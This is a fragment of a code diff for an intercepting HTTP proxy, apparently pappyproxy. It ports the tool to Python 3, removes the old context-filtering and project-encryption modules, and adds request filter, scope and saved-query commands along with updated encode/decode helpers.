to_print += '\nAliases: ' + ', '.join(aliases)
print(to_print)
return f
def gen_dofunc(func, client):
def f(line):
args = shlex.split(line)
func(client, args)
return print_errors(f)
if attr.startswith('do_'):
command = attr[3:]
if command in self._cmds:
return print_pappy_errors(self._cmds[command][0])
return gen_dofunc(self._cmds[command][0], self.client)
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
return print_pappy_errors(self._cmds[real_command][0])
return gen_dofunc(self._cmds[real_command][0], self.client)
elif attr.startswith('help_'):
command = attr[5:]
if command in self._cmds:
@ -111,13 +157,20 @@ class ProxyCmd(cmd2.Cmd):
return self._cmds[real_command][1]
raise AttributeError(attr)
def run_args(self, args):
command = args[0]
if command in self._cmds:
self._cmds[command][0](self.client, args[1:])
elif command in self._aliases:
real_command = self._aliases[command]
if real_command in self._cmds:
self._cmds[real_command][0](self.client, args[1:])
def save_histfile(self):
# Only write to file if not in crypto mode
if not self.session.config.crypt_session:
# Write the command to the history file
if self.session.config.histsize != 0:
readline.set_history_length(self.session.config.histsize)
readline.write_history_file('cmdhistory')
# Write the command to the history file
if self.histsize != 0:
readline.set_history_length(self.histsize)
readline.write_history_file('cmdhistory')
def get_names(self):
# Hack to get cmd to recognize do_/etc functions as functions for things
@ -136,7 +189,7 @@ class ProxyCmd(cmd2.Cmd):
{'command': (do_func, autocomplete_func)}
Use autocomplete_func=None for no autocomplete function
"""
for command, vals in cmd_dict.iteritems():
for command, vals in cmd_dict.items():
do_func, ac_func = vals
self.set_cmd(command, do_func, ac_func)
@ -145,6 +198,8 @@ class ProxyCmd(cmd2.Cmd):
Add an alias for a command.
ie add_alias("foo", "f") will let you run the 'foo' command with 'f'
"""
if command not in self._cmds:
raise KeyError()
self._aliases[alias] = command
def add_aliases(self, alias_list):

View file

@ -1,799 +0,0 @@
import crochet
import re
import shlex
import json
from .http import Request, Response, RepeatableDict
from twisted.internet import defer
from util import PappyException
"""
context.py
Functions and classes involved with managing the current context and filters
"""
scope = []
_BARE_COMPARERS = ('ex','nex')
class Context(object):
"""
A class representing a set of requests that pass a set of filters
:ivar active_filters: Filters that are currently applied to the context
:vartype active_filters: List of functions that takes one :class:`pappyproxy.http.Request` and returns either true or false.
:ivar active_requests: Requests which pass all the filters applied to the context
:type active_requests: Request
:ivar inactive_requests: Requests which do not pass all the filters applied to the context
:type inactive_requests: Request
"""
def __init__(self):
self.active_filters = []
self.complete = True
self.active_requests = []
@staticmethod
def get_memid():
i = 'm%d' % Context._next_in_mem_id
Context._next_in_mem_id += 1
return i
def cache_reset(self):
self.active_requests = []
self.complete = False
def add_filter(self, filt):
"""
Add a filter to the context. This will remove any requests that do not pass
the filter from the ``active_requests`` set.
:param filt: The filter to add
:type filt: Function that takes one :class:`pappyproxy.http.Request` and returns either true or false. (or a :class:`pappyproxy.context.Filter`)
"""
self.active_filters.append(filt)
self.cache_reset()
@defer.inlineCallbacks
def add_filter_string(self, filtstr):
"""
Add a filter to the context by filter string
"""
f = Filter(filtstr)
yield f.generate()
self.add_filter(f)
def filter_up(self):
"""
Removes the last filter that was applied to the context.
"""
# Deletes the last filter of the context
if self.active_filters:
self.active_filters = self.active_filters[:-1]
self.cache_reset()
def set_filters(self, filters):
"""
Set the list of filters for the context.
"""
self.active_filters = filters[:]
self.cache_reset()
@defer.inlineCallbacks
def get_reqs(self, n=-1):
# This is inefficient but I want it to work for now, and as long as we
# don't put the full requests in memory I don't care.
ids = self.active_requests
if (len(ids) >= n and n != -1) or self.complete == True:
if n == -1:
defer.returnValue(ids)
else:
defer.returnValue(ids[:n])
ids = []
for req_d in Request.cache.req_it():
r = yield req_d
passed = True
for filt in self.active_filters:
if not filt(r):
passed = False
break
if passed:
self.active_requests.append(r.reqid)
ids.append(r.reqid)
if len(ids) >= n and n != -1:
defer.returnValue(ids[:n])
self.complete = True
defer.returnValue(ids)
class FilterParseError(PappyException):
pass
def cmp_is(a, b):
if a is None or b is None:
return False
return str(a) == str(b)
def cmp_contains(a, b):
if a is None or b is None:
return False
return (b.lower() in a.lower())
def cmp_exists(a, b=None):
if a is None or b is None:
return False
return (a is not None and a != [])
def cmp_len_eq(a, b):
if a is None or b is None:
return False
return (len(a) == int(b))
def cmp_len_gt(a, b):
if a is None or b is None:
return False
return (len(a) > int(b))
def cmp_len_lt(a, b):
if a is None or b is None:
return False
return (len(a) < int(b))
def cmp_eq(a, b):
if a is None or b is None:
return False
return (int(a) == int(b))
def cmp_gt(a, b):
if a is None or b is None:
return False
return (int(a) > int(b))
def cmp_lt(a, b):
if a is None or b is None:
return False
return (int(a) < int(b))
def cmp_containsr(a, b):
if a is None or b is None:
return False
try:
if re.search(b, a):
return True
return False
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def relation_from_text(s, val=''):
# Gets the relation function associated with the string
# Returns none if not found
def negate_func(func):
def f(*args, **kwargs):
return not func(*args, **kwargs)
return f
negate = False
if s[0] == 'n':
negate = True
s = s[1:]
if s in ("is",):
retfunc = cmp_is
elif s in ("contains", "ct"):
retfunc = cmp_contains
elif s in ("containsr", "ctr"):
validate_regexp(val)
retfunc = cmp_containsr
elif s in ("exists", "ex"):
retfunc = cmp_exists
elif s in ("Leq",):
retfunc = cmp_len_eq
elif s in ("Lgt",):
retfunc = cmp_len_gt
elif s in ("Llt",):
retfunc = cmp_len_lt
elif s in ("eq",):
retfunc = cmp_eq
elif s in ("gt",):
retfunc = cmp_gt
elif s in ("lt",):
retfunc = cmp_lt
else:
raise FilterParseError("Invalid relation: %s" % s)
if negate:
return negate_func(retfunc)
else:
return retfunc
def compval_from_args(args):
"""
NOINDEX
returns a function that compares to a value from text.
ie compval_from_text('ct foo') will return a function that returns true
if the passed in string contains foo.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
if args[0] in _BARE_COMPARERS:
if len(args) != 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], None)
value = None
else:
if len(args) != 2:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
def retfunc(s):
return comparer(s, value)
return retfunc
def compval_from_args_repdict(args):
"""
NOINDEX
Similar to compval_from_args but checks a repeatable dict with up to 2
comparers and values.
"""
if len(args) == 0:
raise PappyException('Invalid number of arguments')
nextargs = args[:]
value = None
if args[0] in _BARE_COMPARERS:
comparer = relation_from_text(args[0], None)
if len(args) > 1:
nextargs = args[1:]
else:
if len(args) == 1:
raise PappyException('Invalid number of arguments')
comparer = relation_from_text(args[0], args[1])
value = args[1]
nextargs = args[2:]
comparer2 = None
value2 = None
if nextargs:
if nextargs[0] in _BARE_COMPARERS:
comparer2 = relation_from_text(nextargs[0], None)
else:
if len(nextargs) == 1:
raise PappyException('Invalid number of arguments')
comparer2 = relation_from_text(nextargs[0], nextargs[1])
value2 = nextargs[1]
def retfunc(d):
for k, v in d.all_pairs():
if comparer2 is None:
if comparer(k, value) or comparer(v, value):
return True
else:
if comparer(k, value) and comparer2(v, value2):
return True
return False
return retfunc
def gen_filter_by_all(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.full_message) and ((not req.response) or compval(req.response.full_message))
else:
return compval(req.full_message) or (req.response and compval(req.response.full_message))
return f
def gen_filter_by_host(args):
compval = compval_from_args(args)
def f(req):
return compval(req.host)
return f
def gen_filter_by_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return compval(req.body) and ((not req.response) or compval(req.response.body))
else:
return compval(req.body) or (req.response and compval(req.response.body))
return f
def gen_filter_by_req_body(args):
compval = compval_from_args(args)
def f(req):
return compval(req.body)
return f
def gen_filter_by_rsp_body(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or compval(req.response.body)
else:
return req.response and compval(req.response.body)
return f
def gen_filter_by_raw_headers(args):
compval = compval_from_args(args)
def f(req):
if args[0][0] == 'n':
# compval already negates comparison
return compval(req.headers_section) and ((not req.response) or compval(req.response.headers_section))
else:
return compval(req.headers_section) or (req.response and compval(req.response.headers_section))
return f
def gen_filter_by_response_code(args):
compval_from_args(args) # try and throw an error
def f(req):
if not req.response:
return False
compval = compval_from_args(args)
return compval(req.response.response_code)
return f
def gen_filter_by_path(args):
compval = compval_from_args(args)
def f(req):
return compval(req.path)
return f
def gen_filter_by_responsetime(args):
compval = compval_from_args(args)
def f(req):
return compval(req.rsptime)
return f
def gen_filter_by_verb(args):
compval = compval_from_args(args)
def f(req):
return compval(req.verb)
return f
def gen_filter_by_tag(args):
compval = compval_from_args(args)
def f(req):
for tag in req.tags:
if compval(tag):
return True
return False
return f
def gen_filter_by_saved(args):
if len(args) != 0:
raise PappyException('Invalid number of arguments')
def f(req):
if req.saved:
return True
else:
return False
return f
@defer.inlineCallbacks
def gen_filter_by_before(args):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start <= r.time_start
defer.returnValue(f)
@defer.inlineCallbacks
def gen_filter_by_after(args, negate=False):
if len(args) != 1:
raise PappyException('Invalid number of arguments')
r = yield Request.load_request(args[0])
def f(req):
if req.time_start is None:
return False
if r.time_start is None:
return False
return req.time_start >= r.time_start
defer.returnValue(f)
def gen_filter_by_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return comparer(req.headers) and ((not req.response) or comparer(req.response.headers))
else:
return comparer(req.headers) or (req.response and comparer(req.response.headers))
return f
def gen_filter_by_request_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.headers)
return f
def gen_filter_by_response_headers(args):
comparer = compval_from_args_repdict(args)
def f(req):
if args[0][0] == 'n':
return (not req.response) or comparer(req.response.headers)
else:
return req.response and comparer(req.response.headers)
return f
def gen_filter_by_submitted_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.cookies)
return f
def gen_filter_by_set_cookies(args):
comparer = compval_from_args_repdict(args)
def f(req):
if not req.response:
return False
checkdict = RepeatableDict()
for k, v in req.response.cookies.all_pairs():
checkdict[k] = v.cookie_str
return comparer(checkdict)
return f
def gen_filter_by_url_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params)
return f
def gen_filter_by_post_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.post_params)
return f
def gen_filter_by_params(args):
comparer = compval_from_args_repdict(args)
def f(req):
return comparer(req.url_params) or comparer(req.post_params)
return f
@defer.inlineCallbacks
def gen_filter_by_inverse(args):
filt = yield Filter.from_filter_string(parsed_args=args)
def f(req):
return not filt(req)
defer.returnValue(f)
def gen_filter_by_websocket(args):
def f(req):
if not req.response:
return False
if Response.is_ws_upgrade(req.response):
return True
return False
return f
@defer.inlineCallbacks
def filter_reqs(reqids, filters):
to_delete = set()
# Could definitely be more efficient, but it stays like this until
# it impacts performance
requests = []
for reqid in reqids:
r = yield Request.load_request(reqid)
requests.append(r)
for req in requests:
for filt in filters:
if not filt(req):
to_delete.add(req)
retreqs = []
retdel = []
for r in requests:
if r in to_delete:
retdel.append(r.reqid)
else:
retreqs.append(r.reqid)
defer.returnValue((retreqs, retdel))
def passes_filters(request, filters):
for filt in filters:
if not filt(request):
return False
return True
def in_scope(request):
global scope
passes = passes_filters(request, scope)
return passes
def set_scope(filters):
global scope
scope = filters
def save_scope(context):
global scope
scope = context.active_filters[:]
def reset_to_scope(context):
global scope
context.active_filters = scope[:]
context.cache_reset()
def print_scope():
global scope
for f in scope:
print f.filter_string
@defer.inlineCallbacks
def store_scope(dbpool):
# Delete the old scope
yield dbpool.runQuery(
"""
DELETE FROM scope
"""
);
# Insert the new scope
i = 0
for f in scope:
yield dbpool.runQuery(
"""
INSERT INTO scope (filter_order, filter_string) VALUES (?, ?);
""",
(i, f.filter_string)
);
i += 1
@defer.inlineCallbacks
def load_scope(dbpool):
global scope
rows = yield dbpool.runQuery(
"""
SELECT filter_order, filter_string FROM scope;
""",
)
rows = sorted(rows, key=lambda r: int(r[0]))
new_scope = []
for row in rows:
new_filter = Filter(row[1])
yield new_filter.generate()
new_scope.append(new_filter)
scope = new_scope
@defer.inlineCallbacks
def clear_tag(tag):
# Remove a tag from every request
reqs = yield Request.cache.load_by_tag(tag)
for req in reqs:
req.tags.discard(tag)
if req.saved:
yield req.async_save()
reset_context_caches()
@defer.inlineCallbacks
def async_set_tag(tag, reqs):
"""
async_set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield clear_tag(tag)
for req in reqs:
req.tags.add(tag)
Request.cache.add(req)
reset_context_caches()
@defer.inlineCallbacks
def save_context(name, filter_strings, dbpool):
"""
Saves the filter strings to the datafile using their name
"""
rows = yield dbpool.runQuery(
"""
SELECT id FROM saved_contexts WHERE context_name=?;
""", (name,)
)
list_str = json.dumps(filter_strings)
if len(rows) > 0:
yield dbpool.runQuery(
"""
UPDATE saved_contexts SET filter_strings=?
WHERE context_name=?;
""", (list_str, name)
)
else:
yield dbpool.runQuery(
"""
INSERT INTO saved_contexts (context_name, filter_strings)
VALUES (?,?);
""", (name, list_str)
)
@defer.inlineCallbacks
def delete_saved_context(name, dbpool):
yield dbpool.runQuery(
"""
DELETE FROM saved_contexts WHERE context_name=?;
""", (name,)
)
@defer.inlineCallbacks
def get_saved_context(name, dbpool):
rows = yield dbpool.runQuery(
"""
SELECT filter_strings FROM saved_contexts WHERE context_name=?;
""", (name,)
)
if len(rows) == 0:
raise PappyException("Saved context with name %s does not exist" % name)
filter_strs = json.loads(rows[0][0])
defer.returnValue(filter_strs)
@defer.inlineCallbacks
def get_all_saved_contexts(dbpool):
rows = yield dbpool.runQuery(
"""
SELECT context_name, filter_strings FROM saved_contexts;
""",
)
all_strs = {}
for row in rows:
all_strs[row[0]] = json.loads(row[1])
defer.returnValue(all_strs)
@crochet.wait_for(timeout=180.0)
@defer.inlineCallbacks
def set_tag(tag, reqs):
"""
set_tag(tag, reqs)
Remove the tag from every request then add the given requests to memory and
give them the tag. The non-async version.
:param tag: The tag to set
:type tag: String
:param reqs: The requests to assign to the tag
:type reqs: List of Requests
"""
yield async_set_tag(tag, reqs)
def validate_regexp(r):
try:
re.compile(r)
except re.error as e:
raise PappyException('Invalid regexp: %s' % e)
def reset_context_caches():
import pappyproxy.pappy
for c in pappyproxy.pappy.all_contexts:
c.cache_reset()
class Filter(object):
"""
A class representing a filter. Its claim to fame is that you can use
:func:`pappyproxy.context.Filter.from_filter_string` to generate a
filter from a filter string.
"""
_filter_functions = {
"all": gen_filter_by_all,
"host": gen_filter_by_host,
"domain": gen_filter_by_host,
"hs": gen_filter_by_host,
"dm": gen_filter_by_host,
"path": gen_filter_by_path,
"pt": gen_filter_by_path,
"body": gen_filter_by_body,
"bd": gen_filter_by_body,
"data": gen_filter_by_body,
"dt": gen_filter_by_body,
"reqbody": gen_filter_by_req_body,
"qbd": gen_filter_by_req_body,
"reqdata": gen_filter_by_req_body,
"qdt": gen_filter_by_req_body,
"rspbody": gen_filter_by_rsp_body,
"sbd": gen_filter_by_rsp_body,
"qspdata": gen_filter_by_rsp_body,
"sdt": gen_filter_by_rsp_body,
"verb": gen_filter_by_verb,
"vb": gen_filter_by_verb,
"param": gen_filter_by_params,
"pm": gen_filter_by_params,
"header": gen_filter_by_headers,
"hd": gen_filter_by_headers,
"reqheader": gen_filter_by_request_headers,
"qhd": gen_filter_by_request_headers,
"rspheader": gen_filter_by_response_headers,
"shd": gen_filter_by_response_headers,
"rawheaders": gen_filter_by_raw_headers,
"rh": gen_filter_by_raw_headers,
"sentcookie": gen_filter_by_submitted_cookies,
"sck": gen_filter_by_submitted_cookies,
"setcookie": gen_filter_by_set_cookies,
"stck": gen_filter_by_set_cookies,
"statuscode": gen_filter_by_response_code,
"sc": gen_filter_by_response_code,
"responsecode": gen_filter_by_response_code,
"tag": gen_filter_by_tag,
"tg": gen_filter_by_tag,
"saved": gen_filter_by_saved,
"svd": gen_filter_by_saved,
"websocket": gen_filter_by_websocket,
"ws": gen_filter_by_websocket,
}
_async_filter_functions = {
"before": gen_filter_by_before,
"b4": gen_filter_by_before,
"bf": gen_filter_by_before,
"after": gen_filter_by_after,
"af": gen_filter_by_after,
"inv": gen_filter_by_inverse,
}
def __init__(self, filter_string):
self.filter_string = filter_string
def __call__(self, *args, **kwargs):
return self.filter_func(*args, **kwargs)
def __repr__(self):
return '<Filter "%s">' % self.filter_string
@defer.inlineCallbacks
def generate(self):
self.filter_func = yield self.from_filter_string(self.filter_string)
@staticmethod
@defer.inlineCallbacks
def from_filter_string(filter_string=None, parsed_args=None):
"""
from_filter_string(filter_string)
Create a filter from a filter string. If passed a list of arguments, they
will be used instead of parsing the string.
:rtype: Deferred that returns a :class:`pappyproxy.context.Filter`
"""
if parsed_args is not None:
args = parsed_args
else:
args = shlex.split(filter_string)
if len(args) == 0:
raise PappyException('Field is required')
field = args[0]
new_filter = None
field_args = args[1:]
if field in Filter._filter_functions:
new_filter = Filter._filter_functions[field](field_args)
elif field in Filter._async_filter_functions:
new_filter = yield Filter._async_filter_functions[field](field_args)
else:
raise FilterParseError("%s is not a valid field" % field)
if new_filter is None:
raise FilterParseError("Error creating filter")
defer.returnValue(new_filter)

View file

@ -1,236 +0,0 @@
#!/usr/bin/env python
import crochet
import getpass
import glob
import os
import pappyproxy
import scrypt
import shutil
import twisted
from . import compress
from .util import PappyException
from base64 import b64encode, b64decode
from cryptography.fernet import Fernet, InvalidToken
from twisted.internet import reactor, defer
class Crypto(object):
def __init__(self, sessconfig):
self.config = sessconfig
self.archive = sessconfig.archive
self.compressor = compress.Compress(sessconfig)
self.key = None
self.password = None
self.salt = None
def encrypt_project(self):
"""
Compress and encrypt the project files,
deleting clear-text files afterwards
"""
# Leave the crypto working directory
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.compressor.compress_project()
# Get the password and salt, then derive the key
self.crypto_ramp_up()
# Create project and crypto archive
archive_file = open(self.archive, 'rb')
archive_crypt = open(self.config.crypt_file, 'wb')
try:
# Encrypt the archive read as a bytestring
fern = Fernet(self.key)
crypt_token = fern.encrypt(archive_file.read())
archive_crypt.write(crypt_token)
except InvalidToken as e:
raise PappyException("Error encrypting project: ", e)
return False
archive_file.close()
archive_crypt.close()
# Store the salt for the next decryption
self.create_salt_file()
# Delete clear-text files
self.delete_clear_files()
return True
def decrypt_project(self):
"""
Decrypt and decompress the project files
"""
# Decrypt and decompress the project if crypt_file exists
if os.path.isfile(self.config.crypt_file):
cf = self.config.crypt_file
sl = self.config.salt_len
crl = os.path.getsize(cf) - sl
archive_crypt = open(cf, 'rb').read(crl)
archive_file = open(self.config.archive, 'wb')
retries = 3
while True:
try:
self.crypto_ramp_up()
fern = Fernet(self.key)
archive = fern.decrypt(archive_crypt)
break
except InvalidToken as e:
print "Invalid decryption: ", e
retries -= 1
# Quit pappy if user doesn't retry
# or if all retries exhuasted
if not self.confirm_password_retry() or retries <= 0:
os.remove(self.config.archive)
return False
else:
self.password = None
self.key = None
pass
archive_file.write(archive)
archive_file.close()
self.compressor.decompress_project()
self.delete_crypt_files()
os.chdir(self.config.crypt_dir)
return True
# If project exited before encrypting the working directory
# change to the working directory to resume the session
elif os.path.isdir(self.config.crypt_dir):
os.chdir(self.config.crypt_dir)
return True
# If project hasn't been encrypted before,
# setup crypt working directory
else:
os.mkdir(self.config.crypt_dir)
project_files = self.config.get_project_files()
for pf in project_files:
shutil.copy2(pf, self.config.crypt_dir)
os.chdir(self.config.crypt_dir)
return True
def confirm_password_retry(self):
answer = raw_input("Re-enter your password? (y/n): ").strip()
if answer[0] == "y" or answer[0] == "Y":
return True
else:
return False
def crypto_ramp_up(self):
if not self.password:
self.get_password()
if not self.salt:
self.set_salt()
self.derive_key()
def get_password(self):
"""
Retrieve password from the user. Raise an exception if the
password is not capable of utf-8 encoding.
"""
encoded_passwd = ""
try:
passwd = getpass.getpass("Enter a password: ").strip()
self.password = passwd.encode("utf-8")
except:
raise PappyException("Invalid password, try again")
def set_salt(self):
if self.config.crypt_dir in os.getcwd():
os.chdir('../')
self.set_salt_from_file()
os.chdir(self.config.crypt_dir)
elif os.path.isfile(self.config.crypt_file):
self.set_salt_from_file()
else:
self.salt = os.urandom(16)
def set_salt_from_file(self):
try:
# Seek to `salt_len` bytes before the EOF
# then read `salt_len` bytes to retrieve the salt
# WARNING: must open `crypt_file` in `rb` mode
# or `salt_file.seek()` will result in undefined
# behavior.
salt_file = open(self.config.crypt_file, 'rb')
sl = self.config.salt_len
# Negate the salt length to seek to the
# correct position in the buffer
salt_file.seek(-sl, 2)
self.salt = salt_file.read(sl)
salt_file.close()
except:
cf = self.config.crypt_file
raise PappyException("Unable to read %s" % cf)
def create_salt_file(self):
salt_file = open(self.config.crypt_file, 'a')
salt_file.write(self.salt)
salt_file.close()
def derive_key(self):
"""
Derive a key sufficient for use as a cryptographic key
used to encrypt the project (currently: cryptography.Fernet).
cryptography.Fernet utilizes AES-CBC-128, requiring a 32-byte key.
Parameter notes from the py-scrypt source-code:
https://bitbucket.org/mhallin/py-scrypt/
Compute scrypt(password, salt, N, r, p, buflen).
The parameters r, p, and buflen must satisfy r * p < 2^30 and
buflen <= (2^32 - 1) * 32. The parameter N must be a power of 2
greater than 1. N, r and p must all be positive.
Notes for Python 2:
- `password` and `salt` must be str instances
- The result will be a str instance
Notes for Python 3:
- `password` and `salt` can be both str and bytes. If they are str
instances, they wil be encoded with utf-8.
- The result will be a bytes instance
Exceptions raised:
- TypeError on invalid input
- scrypt.error if scrypt failed
"""
try:
if not self.key:
shash = scrypt.hash(self.password, self.salt, buflen=32)
self.key = b64encode(shash)
except TypeError as e:
raise PappyException("Scrypt failed with type error: ", e)
except scrypt.error, e:
raise PappyException("Scrypt failed with internal error: ", e)
def delete_clear_files(self):
"""
Deletes all clear-text files left in the project directory.
"""
shutil.rmtree(self.config.crypt_dir)
os.remove(self.config.archive)
def delete_crypt_files(self):
"""
Deletes all encrypted-text files in the project directory.
Forces generation of new salt after opening and closing the project.
Adds security in the case of a one-time compromise of the system.
"""
os.remove(self.config.crypt_file)

View file

@ -1,3 +0,0 @@
{
"cache_size": 2000
}

View file

@ -1,9 +0,0 @@
{
"data_file": "./data.db",
"cert_dir": "{DATADIR}/certs",
"history_size": 1000,
"proxy_listeners": [
{"port": 8000, "interface": "127.0.0.1"}
],
"socks_proxy": null
}

File diff suppressed because it is too large Load diff

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

Binary file not shown.

View file

@ -0,0 +1,245 @@
from itertools import groupby
from ..proxy import InvalidQuery, time_to_nsecs
from ..colors import Colors, Styles
# class BuiltinFilters(object):
# _filters = {
# 'not_image': (
# ['path nctr "(\.png$|\.jpg$|\.gif$)"'],
# 'Filter out image requests',
# ),
# 'not_jscss': (
# ['path nctr "(\.js$|\.css$)"'],
# 'Filter out javascript and css files',
# ),
# }
# @staticmethod
# @defer.inlineCallbacks
# def get(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('%s not a bult in filter' % name)
# if name in BuiltinFilters._filters:
# filters = [pappyproxy.context.Filter(f) for f in BuiltinFilters._filters[name][0]]
# for f in filters:
# yield f.generate()
# defer.returnValue(filters)
# raise PappyException('"%s" is not a built-in filter' % name)
# @staticmethod
# def list():
# return [k for k, v in BuiltinFilters._filters.iteritems()]
# @staticmethod
# def help(name):
# if name not in BuiltinFilters._filters:
# raise PappyException('"%s" is not a built-in filter' % name)
# return pappyproxy.context.Filter(BuiltinFilters._filters[name][1])
# def complete_filtercmd(text, line, begidx, endidx):
# strs = [k for k, v in pappyproxy.context.Filter._filter_functions.iteritems()]
# strs += [k for k, v in pappyproxy.context.Filter._async_filter_functions.iteritems()]
# return autocomplete_startswith(text, strs)
# def complete_builtin_filter(text, line, begidx, endidx):
# all_names = BuiltinFilters.list()
# if not text:
# ret = all_names[:]
# else:
# ret = [n for n in all_names if n.startswith(text)]
# return ret
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def builtin_filter(line):
# if not line:
# raise PappyException("Filter name required")
# filters_to_add = yield BuiltinFilters.get(line)
# for f in filters_to_add:
# print f.filter_string
# yield pappyproxy.pappy.main_context.add_filter(f)
# defer.returnValue(None)
def filtercmd(client, args):
"""
Apply a filter to the current context
Usage: filter <filter string>
See README.md for information on filter strings
"""
try:
phrases = [list(group) for k, group in groupby(args, lambda x: x == "OR") if not k]
for phrase in phrases:
# we do before/after by id not by timestamp
if phrase[0] in ('before', 'b4', 'after', 'af') and len(phrase) > 1:
r = client.req_by_id(phrase[1], headers_only=True)
phrase[1] = str(time_to_nsecs(r.time_start))
client.context.apply_phrase(phrases)
except InvalidQuery as e:
print(e)
def filter_up(client, args):
"""
Remove the last applied filter
Usage: filter_up
"""
client.context.pop_phrase()
def filter_clear(client, args):
"""
Reset the context so that it contains no filters (ignores scope)
Usage: filter_clear
"""
client.context.set_query([])
def filter_list(client, args):
"""
Print the filters that make up the current context
Usage: filter_list
"""
from ..util import print_query
print_query(client.context.query)
def scope_save(client, args):
"""
Set the scope to be the current context. Saved between launches
Usage: scope_save
"""
client.set_scope(client.context.query)
def scope_reset(client, args):
"""
Set the context to be the scope (view in-scope items)
Usage: scope_reset
"""
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope. Cannot set context to scope.")
return
client.context.set_query(result.filter)
def scope_delete(client, args):
"""
Delete the scope so that it contains all request/response pairs
Usage: scope_delete
"""
client.set_scope([])
def scope_list(client, args):
"""
Print the filters that make up the scope
Usage: scope_list
"""
from ..util import print_query
result = client.get_scope()
if result.is_custom:
print("Proxy is using a custom function to check scope")
return
print_query(result.filter)
def list_saved_queries(client, args):
from ..util import print_query
queries = client.all_saved_queries()
print('')
for q in queries:
print(Styles.TABLE_HEADER + q.name + Colors.ENDC)
print_query(q.query)
print('')
def save_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name to save filters as")
return
client.save_query(args[0], client.context.query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(client.context.query)
print('')
def load_query(client, args):
from ..util import print_query
if len(args) != 1:
print("Must give name of query to load")
return
new_query = client.load_query(args[0])
client.context.set_query(new_query)
print('')
print(Styles.TABLE_HEADER + args[0] + Colors.ENDC)
print_query(new_query)
print('')
def delete_query(client, args):
if len(args) != 1:
print("Must give name of filter")
return
client.delete_query(args[0])
# @crochet.wait_for(timeout=None)
# @defer.inlineCallbacks
# def filter_prune(line):
# """
# Delete all out of context requests from the data file.
# CANNOT BE UNDONE!! Be careful!
# Usage: filter_prune
# """
# # Delete filtered items from datafile
# print ''
# print 'Currently active filters:'
# for f in pappyproxy.pappy.main_context.active_filters:
# print '> %s' % f.filter_string
# # We copy so that we're not removing items from a set we're iterating over
# act_reqs = yield pappyproxy.pappy.main_context.get_reqs()
# inact_reqs = set(Request.cache.req_ids()).difference(set(act_reqs))
# message = 'This will delete %d/%d requests. You can NOT undo this!! Continue?' % (len(inact_reqs), (len(inact_reqs) + len(act_reqs)))
# #print message
# if not confirm(message, 'n'):
# defer.returnValue(None)
# for reqid in inact_reqs:
# try:
# req = yield pappyproxy.http.Request.load_request(reqid)
# yield req.deep_delete()
# except PappyException as e:
# print e
# print 'Deleted %d requests' % len(inact_reqs)
# defer.returnValue(None)
###############
## Plugin hooks
def load_cmds(cmd):
cmd.set_cmds({
#'filter': (filtercmd, complete_filtercmd),
'filter': (filtercmd, None),
'filter_up': (filter_up, None),
'filter_list': (filter_list, None),
'filter_clear': (filter_clear, None),
'scope_list': (scope_list, None),
'scope_delete': (scope_delete, None),
'scope_reset': (scope_reset, None),
'scope_save': (scope_save, None),
'list_saved_queries': (list_saved_queries, None),
# 'filter_prune': (filter_prune, None),
# 'builtin_filter': (builtin_filter, complete_builtin_filter),
'save_query': (save_query, None),
'load_query': (load_query, None),
'delete_query': (delete_query, None),
})
cmd.add_aliases([
('filter', 'f'),
('filter', 'fl'),
('filter_up', 'fu'),
('filter_list', 'fls'),
('filter_clear', 'fc'),
('scope_list', 'sls'),
('scope_reset', 'sr'),
('list_saved_queries', 'sqls'),
# ('builtin_filter', 'fbi'),
('save_query', 'sq'),
('load_query', 'lq'),
('delete_query', 'dq'),
])

View file

@ -1,5 +1,4 @@
import HTMLParser
import StringIO
import html
import base64
import datetime
import gzip
@ -7,31 +6,33 @@ import shlex
import string
import urllib
from pappyproxy.util import PappyException, hexdump, printable_data, copy_to_clipboard, clipboard_contents
from ..util import hexdump, printable_data, copy_to_clipboard, clipboard_contents, encode_basic_auth, parse_basic_auth
from ..console import CommandError
from io import StringIO
def print_maybe_bin(s):
binary = False
for c in s:
if c not in string.printable:
if chr(c) not in string.printable:
binary = True
break
if binary:
print hexdump(s)
print(hexdump(s))
else:
print s
print(s.decode())
def asciihex_encode_helper(s):
return ''.join('{0:x}'.format(ord(c)) for c in s)
return ''.join('{0:x}'.format(c) for c in s).encode()
def asciihex_decode_helper(s):
ret = []
try:
for a, b in zip(s[0::2], s[1::2]):
c = a+b
c = chr(a)+chr(b)
ret.append(chr(int(c, 16)))
return ''.join(ret)
return ''.join(ret).encode()
except Exception as e:
raise PappyException(e)
raise CommandError(e)
def gzip_encode_helper(s):
out = StringIO.StringIO()
@ -54,203 +55,223 @@ def base64_decode_helper(s):
return s_padded
except:
pass
raise PappyException("Unable to base64 decode string")
raise CommandError("Unable to base64 decode string")
def url_decode_helper(s):
bs = s.decode()
return urllib.parse.unquote(bs).encode()
def url_encode_helper(s):
bs = s.decode()
return urllib.parse.quote_plus(bs).encode()
def html_encode_helper(s):
